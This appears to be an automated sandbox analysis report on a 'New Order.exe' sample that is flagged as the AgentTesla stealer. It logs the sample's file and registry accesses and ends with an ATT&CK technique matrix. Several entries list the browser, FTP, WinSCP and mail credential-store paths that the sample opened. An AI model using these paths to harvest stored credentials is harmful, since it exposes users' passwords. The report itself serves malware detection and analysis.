Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Users\user\Desktop\New Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.687646589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.365875763.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: New Order.exe PID: 4652, type: MEMORY
Source: Yara match	File source: Process Memory Space: New Order.exe PID: 5976, type: MEMORY
Source: Yara match	File source: 3.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\New Order.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\New Order.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\New Order.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\New Order.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: New Order.exe PID: 4652, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.687646589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.365875763.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: New Order.exe PID: 4652, type: MEMORY
Source: Yara match	File source: Process Memory Space: New Order.exe PID: 5976, type: MEMORY
Source: Yara match	File source: 3.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation311	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection12	Deobfuscate/Decode Files or Information1	Credentials in Registry1	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Scheduled Task/Job1	Obfuscated Files or Information3	Security Account Manager	Security Software Discovery421	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing12	NTDS	Virtualization/Sandbox Evasion24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
